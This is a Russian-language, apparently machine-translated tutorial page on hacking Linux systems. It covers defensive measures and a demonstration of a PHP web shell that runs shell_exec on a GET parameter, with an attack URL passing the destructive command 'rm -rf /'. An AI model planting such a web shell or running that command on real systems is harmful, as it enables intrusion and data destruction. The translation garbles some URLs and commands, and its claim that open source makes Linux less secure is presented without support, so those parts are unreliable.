Учебники

17) Взлом систем Linux

Linux является наиболее широко используемой серверной операционной системой, особенно для веб-серверов. Это с открытым исходным кодом; это означает, что любой может иметь доступ к исходному коду. Это делает его менее безопасным по сравнению с другими операционными системами, поскольку злоумышленники могут изучить исходный код, чтобы найти уязвимости . Linux Hacking — это использование этих уязвимостей для получения несанкционированного доступа к системе.

В этой статье мы познакомим вас с тем, что такое Linux, его уязвимостями безопасности и контрмерами, которые вы можете предпринять.

 

 

Темы, рассматриваемые в этом уроке

Краткое примечание по Linux

Linux является операционной системой с открытым исходным кодом . Существует много дистрибутивов операционных систем на основе Linux, таких как Redhat, Fedora, Ubuntu и т. Д. В отличие от других операционных систем, Linux менее безопасен, когда речь заходит о безопасности. Это связано с тем, что исходный код доступен бесплатно, поэтому его легко изучить на наличие уязвимостей и использовать их по сравнению с другими операционными системами, не имеющими открытого кода. Linux можно использовать в качестве операционной системы для сервера, настольного компьютера, планшета или мобильного устройства.

Программы Linux могут работать с использованием графического интерфейса или команд. Команды более эффективны и действенны по сравнению с использованием графического интерфейса. По этой причине полезно знать основные команды Linux.

Обратитесь к этим учебникам https://www.guru99.com/unix-linux-tutorial.html, чтобы узнать, как начать работу с Linux.

Инструменты взлома Linux

Приведенный выше список не является исчерпывающим; это дает вам представление об инструментах, доступных для взлома систем Linux.

Как предотвратить взломы Linux

Linux Hacking использует уязвимости в операционной системе. Организация может принять следующую политику, чтобы защитить себя от таких атак.

  • Управление исправлениями — исправления исправляют ошибки, которые злоумышленники используют для взлома системы. Хорошая политика управления исправлениями гарантирует, что вы постоянно применяете соответствующие исправления к своей системе.
  • Правильная настройка ОС — другие эксплойты используют недостатки конфигурации сервера. Неактивные имена пользователей и демоны должны быть отключены. Настройки по умолчанию, такие как общие пароли к приложению, имена пользователей по умолчанию и некоторые номера портов, должны быть изменены.
  • Система обнаружения вторжений — такие инструменты могут использоваться для обнаружения несанкционированного доступа к системе. Некоторые инструменты имеют возможность обнаруживать и предотвращать такие атаки.

Взлом деятельности: взломать систему Ubuntu Linux с помощью PHP

В этом практическом сценарии мы предоставим вам основную информацию о том, как вы можете использовать PHP для компрометации Linux. Мы не собираемся предназначаться для любой жертвы. Если вы хотите попробовать это, вы можете установить LAMPP на свой локальный компьютер.

PHP поставляется с двумя функциями, которые можно использовать для выполнения команд Linux. Он имеет функции exec () и shell_exec (). Функция exec () возвращает последнюю строку вывода команды, а shell_exec () возвращает весь результат команды в виде строки.

Для демонстрации предположим, что менеджеры злоумышленника загрузили следующий файл на веб-сервер.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

 

ВОТ,

Приведенный выше скрипт получает команду из переменной GET с именем cmd. Команда выполняется с помощью shell_exec () и результаты возвращаются в браузере.

Приведенный выше код можно использовать, используя следующий URL

HTTP: //localhost/cp/konsole.php CMD = 20% Ls-л

ВОТ,

  • «… Konsole.php? Cmd = ls% 20-l» присваивает значение ls –l переменной cmd .

Команда, выполненная на сервере, будет

shell_exec('ls -l') ;

Выполнение вышеуказанного кода на веб-сервере дает результаты, подобные следующим.

Взлом Linux систем

Приведенная выше команда просто отображает файлы в текущем каталоге и разрешения

Давайте предположим, что атакующий передает следующую команду

rm -rf /

ВОТ,

  • «Rm» удаляет файлы
  • «Rf» заставляет команду rm работать в рекурсивном режиме. Удаление всех папок и файлов
  • «/» Указывает команде начать удаление файлов из корневого каталога

URL атаки будет выглядеть примерно так

HTTP: //localhost/cp/konsole.php CMD = гт% 20-РЧ% 20 /

Резюме

  • Linux — популярная операционная система для серверов, настольных компьютеров, планшетов и мобильных устройств.
  • Linux является открытым исходным кодом, и исходный код может быть получен любым. Это позволяет легко обнаружить уязвимости.
  • Основные и сетевые команды ценны для хакеров Linux.
  • Уязвимости — это слабость, которую можно использовать для взлома системы.
  • Хорошая защита может помочь защитить систему от взлома злоумышленником.